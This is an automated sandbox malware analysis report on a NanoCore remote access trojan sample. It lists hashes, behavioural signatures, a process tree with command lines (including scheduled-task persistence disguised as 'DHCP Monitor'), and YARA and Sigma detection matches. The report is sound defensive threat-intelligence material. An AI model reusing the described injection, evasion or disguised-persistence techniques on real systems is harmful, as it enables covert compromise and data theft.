Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report dAkJsQr7A9.exe

Overview

General Information

Sample Name:dAkJsQr7A9.exe
Analysis ID:500960
MD5:b115228fe5e180f505c081aa829c1a86
SHA1:c242c6a90ae569e55ed6acdb5c765244f623b9b6
SHA256:a64c1b956bb79c5cfec594165a4ba37e9f695f8f83ec2b7bc2729d19c2598cd5
Tags:exeNanoCoreRAT
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: NanoCore
Detected Nanocore Rat
Yara detected AntiVM autoit script
Yara detected Nanocore RAT
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses dynamic DNS services
Drops PE files with a suspicious file extension
Writes to foreign memory regions
Protects its processes via BreakOnTermination flag
Machine Learning detection for dropped file
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to simulate keystroke presses
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
OS version to string mapping found (often used in BOTs)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Contains functionality to execute programs as a different user
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Installs a raw input device (often for capturing keystrokes)
File is packed with WinRar
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Potential key logger detected (key state polling based)
Contains functionality to simulate mouse events
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Classification

Process Tree

  • System is w10x64
  • dAkJsQr7A9.exe (PID: 6308 cmdline: 'C:\Users\user\Desktop\dAkJsQr7A9.exe' MD5: B115228FE5E180F505C081AA829C1A86)
    • xmjk.pif (PID: 6660 cmdline: 'C:\Users\user\31956653\xmjk.pif' thjfdg.xcp MD5: 279DAE7236F5F2488A4BACDE6027F730)
      • RegSvcs.exe (PID: 5792 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
        • schtasks.exe (PID: 7124 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp7982.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 6760 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp7CDE.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • RegSvcs.exe (PID: 6312 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0 MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 6560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • xmjk.pif (PID: 6848 cmdline: 'C:\Users\user\31956653\xmjk.pif' C:\Users\user\31956653\thjfdg.xcp MD5: 279DAE7236F5F2488A4BACDE6027F730)
  • dhcpmon.exe (PID: 7096 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0 MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 7112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • xmjk.pif (PID: 4356 cmdline: 'C:\Users\user\31956653\xmjk.pif' C:\Users\user\31956653\thjfdg.xcp MD5: 279DAE7236F5F2488A4BACDE6027F730)
    • RegSvcs.exe (PID: 5572 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • wscript.exe (PID: 6420 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\31956653\Update.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • xmjk.pif (PID: 4608 cmdline: 'C:\Users\user\31956653\xmjk.pif' C:\Users\user\31956653\thjfdg.xcp MD5: 279DAE7236F5F2488A4BACDE6027F730)
    • xmjk.pif (PID: 3412 cmdline: 'C:\Users\user\31956653\xmjk.pif' C:\Users\user\31956653\thjfdg.xcp MD5: 279DAE7236F5F2488A4BACDE6027F730)
      • RegSvcs.exe (PID: 6788 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • dhcpmon.exe (PID: 6232 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 4544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.350179976.000000000449A000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0xf9ed:$x1: NanoCore.ClientPluginHost
  • 0xfa2a:$x2: IClientNetworkHost
  • 0x1355d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000004.00000003.350179976.000000000449A000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000004.00000003.350179976.000000000449A000.00000004.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0xf755:$a: NanoCore
    • 0xf765:$a: NanoCore
    • 0xf999:$a: NanoCore
    • 0xf9ad:$a: NanoCore
    • 0xf9ed:$a: NanoCore
    • 0xf7b4:$b: ClientPlugin
    • 0xf9b6:$b: ClientPlugin
    • 0xf9f6:$b: ClientPlugin
    • 0xf8db:$c: ProjectData
    • 0x102e2:$d: DESCrypto
    • 0x17cae:$e: KeepAlive
    • 0x15c9c:$g: LogClientMessage
    • 0x11e97:$i: get_Connected
    • 0x10618:$j: #=q
    • 0x10648:$j: #=q
    • 0x10664:$j: #=q
    • 0x10694:$j: #=q
    • 0x106b0:$j: #=q
    • 0x106cc:$j: #=q
    • 0x106fc:$j: #=q
    • 0x10718:$j: #=q
    00000004.00000003.350063292.0000000004431000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0xf9dd:$x1: NanoCore.ClientPluginHost
    • 0x441e5:$x1: NanoCore.ClientPluginHost
    • 0xfa1a:$x2: IClientNetworkHost
    • 0x44222:$x2: IClientNetworkHost
    • 0x1354d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    • 0x47d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    00000004.00000003.350063292.0000000004431000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      Click to see the 181 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      20.3.xmjk.pif.4d3c088.5.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x1018d:$x1: NanoCore.ClientPluginHost
      • 0x101ca:$x2: IClientNetworkHost
      • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      20.3.xmjk.pif.4d3c088.5.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0xff05:$x1: NanoCore Client.exe
      • 0x1018d:$x2: NanoCore.ClientPluginHost
      • 0x117c6:$s1: PluginCommand
      • 0x117ba:$s2: FileCommand
      • 0x1266b:$s3: PipeExists
      • 0x18422:$s4: PipeCreated
      • 0x101b7:$s5: IClientLoggingHost
      20.3.xmjk.pif.4d3c088.5.raw.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
        20.3.xmjk.pif.4d3c088.5.raw.unpackNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
        • 0xfef5:$a: NanoCore
        • 0xff05:$a: NanoCore
        • 0x10139:$a: NanoCore
        • 0x1014d:$a: NanoCore
        • 0x1018d:$a: NanoCore
        • 0xff54:$b: ClientPlugin
        • 0x10156:$b: ClientPlugin
        • 0x10196:$b: ClientPlugin
        • 0x1007b:$c: ProjectData
        • 0x10a82:$d: DESCrypto
        • 0x1844e:$e: KeepAlive
        • 0x1643c:$g: LogClientMessage
        • 0x12637:$i: get_Connected
        • 0x10db8:$j: #=q
        • 0x10de8:$j: #=q
        • 0x10e04:$j: #=q
        • 0x10e34:$j: #=q
        • 0x10e50:$j: #=q
        • 0x10e6c:$j: #=q
        • 0x10e9c:$j: #=q
        • 0x10eb8:$j: #=q
        25.2.RegSvcs.exe.34d9650.3.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
        • 0x42a6:$x1: NanoCore.ClientPluginHost
        Click to see the 172 entries

        Sigma Overview

        AV Detection:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 5792, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        E-Banking Fraud:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 5792, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        System Summary:

        barindex
        Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
        Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, CommandLine: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\31956653\xmjk.pif' thjfdg.xcp, ParentImage: C:\Users\user\31956653\xmjk.pif, ParentProcessId: 6660, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 5792
        Sigma detected: Possible Applocker BypassShow sources
        Source: Process startedAuthor: juju4: Data: Command: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, CommandLine: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\31956653\xmjk.pif' thjfdg.xcp, ParentImage: C:\Users\user\31956653\xmjk.pif, ParentProcessId: 6660, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 5792

        Stealing of Sensitive Information:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 5792, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        Remote Access Functionality:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 5792, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        Jbx Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 20.3.xmjk.pif.4d3c088.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegSvcs.exe.60b0000.11.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.RegSvcs.exe.44cb041.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegSvcs.exe.3f3b041.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegSvcs.exe.60b0000.11.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3df3078.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4c69c50.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.xmjk.pif.4537078.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4c9e458.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegSvcs.exe.b00000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegSvcs.exe.60b4629.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.xmjk.pif.44ce068.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4cd3078.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3d55448.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4cd3078.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.xmjk.pif.4465058.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3e5c088.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4d3c088.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.xmjk.pif.4537078.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3d89c50.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.RegSvcs.exe.44c560b.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegSvcs.exe.3f3b041.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4cd3078.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4cd3078.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegSvcs.exe.3f3560b.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4c69c50.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.RegSvcs.exe.44cb041.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3e5c088.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3e5c088.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3e5c088.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3df3078.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.xmjk.pif.4465058.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4d3c088.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4d3c088.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.RegSvcs.exe.bc0000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4c35448.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegSvcs.exe.3f307ce.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.xmjk.pif.44ce068.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3dbe458.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3d89c50.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.RegSvcs.exe.44c07ce.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000004.00000003.350179976.000000000449A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.350063292.0000000004431000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411798480.0000000003E28000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.412888978.0000000003E28000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.394776495.0000000004C6A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.352276623.00000000044CE000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411513032.0000000003D56000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.394077058.0000000003EA4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.395083059.0000000004C36000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411892507.0000000003E5C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.414829262.0000000003D56000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.352230581.00000000044CE000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411602320.0000000003DBF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.392253067.0000000004CD4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.412949182.00000000005A6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.414560875.0000000003DF3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.352180992.0000000004466000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001F.00000002.439114989.0000000000752000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.352056687.000000000449A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.391774753.0000000004C36000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411727538.0000000003DF4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.391477356.0000000004C9F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.414304073.0000000003D8A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.391366953.0000000004C36000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.351507345.0000000004503000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.350312058.0000000004431000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.350212865.0000000003748000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.413709722.0000000003DBF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.392467054.0000000004D08000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411158873.0000000003D56000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.395194489.0000000004C01000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.350502878.0000000004503000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.581022172.00000000060B0000.00000004.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.391714719.0000000004C6A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.576672734.0000000002EE1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.573655036.0000000000B02000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.394033269.0000000004D08000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.579331613.0000000003F29000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001F.00000002.440127421.0000000003E89000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.350252312.0000000004466000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.352384580.0000000004431000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411291828.0000000003DBF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.391833117.0000000004C9F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411683482.0000000003DF4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.391948004.0000000004CD4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.418761309.0000000004479000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.391514426.0000000004C01000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411424843.0000000003D8A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.352498016.0000000003748000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.418519690.0000000003471000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.415517736.0000000000BC2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.392573341.0000000004D3C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.394945613.0000000004CD3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.415163976.0000000003D21000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.394535307.0000000004C9F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411346377.0000000003D21000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001F.00000002.440034174.0000000002E81000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: xmjk.pif PID: 6660, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5792, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: xmjk.pif PID: 4356, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5572, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: xmjk.pif PID: 3412, type: MEMORYSTR
        Multi AV Scanner detection for submitted fileShow sources
        Source: dAkJsQr7A9.exeReversingLabs: Detection: 59%
        Multi AV Scanner detection for dropped fileShow sources
        Source: C:\Users\user\31956653\xmjk.pifMetadefender: Detection: 37%Perma Link
        Source: C:\Users\user\31956653\xmjk.pifReversingLabs: Detection: 55%
        Machine Learning detection for sampleShow sources
        Source: dAkJsQr7A9.exeJoe Sandbox ML: detected
        Machine Learning detection for dropped fileShow sources
        Source: C:\Users\user\31956653\xmjk.pifJoe Sandbox ML: detected
        Source: 6.2.RegSvcs.exe.b00000.1.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 6.2.RegSvcs.exe.60b0000.11.unpackAvira: Label: TR/NanoCore.fadte
        Source: 25.2.RegSvcs.exe.bc0000.1.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: dAkJsQr7A9.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
        Source: dAkJsQr7A9.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: dAkJsQr7A9.exe, 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
        Source: Binary string: mscorlib.pdb source: RegSvcs.exe, 00000006.00000003.518192059.00000000013AE000.00000004.00000001.sdmp
        Source: Binary string: RegSvcs.pdb, source: xmjk.pif, 00000004.00000003.359156674.0000000001329000.00000004.00000001.sdmp, RegSvcs.exe, 00000006.00000003.448460705.0000000001378000.00000004.00000001.sdmp, RegSvcs.exe, 0000000A.00000002.365790263.0000000000692000.00000002.00020000.sdmp, dhcpmon.exe, 0000000F.00000002.370470971.00000000007F2000.00000002.00020000.sdmp, RegSvcs.exe, 00000019.00000000.393856282.00000000007F2000.00000002.00020000.sdmp
        Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 00000006.00000002.576672734.0000000002EE1000.00000004.00000001.sdmp, RegSvcs.exe, 00000019.00000002.418519690.0000000003471000.00000004.00000001.sdmp
        Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, dhcpmon.exe, 0000000F.00000002.370470971.00000000007F2000.00000002.00020000.sdmp, RegSvcs.exe, 00000019.00000000.393856282.00000000007F2000.00000002.00020000.sdmp
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CAA2DF FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00CAA2DF
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CC9FD3 FindFirstFileExA,0_2_00CC9FD3
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CBAFB9 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00CBAFB9
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_0042399B GetFileAttributesW,FindFirstFileW,FindClose,4_2_0042399B
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_0043BCB3 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,4_2_0043BCB3
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_00442408 FindFirstFileW,Sleep,FindNextFileW,FindClose,4_2_00442408
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_0043280D FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_0043280D
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_00421A73 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_00421A73
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_0043BF17 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,4_2_0043BF17
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_00442408 FindFirstFileW,Sleep,FindNextFileW,FindClose,13_2_00442408
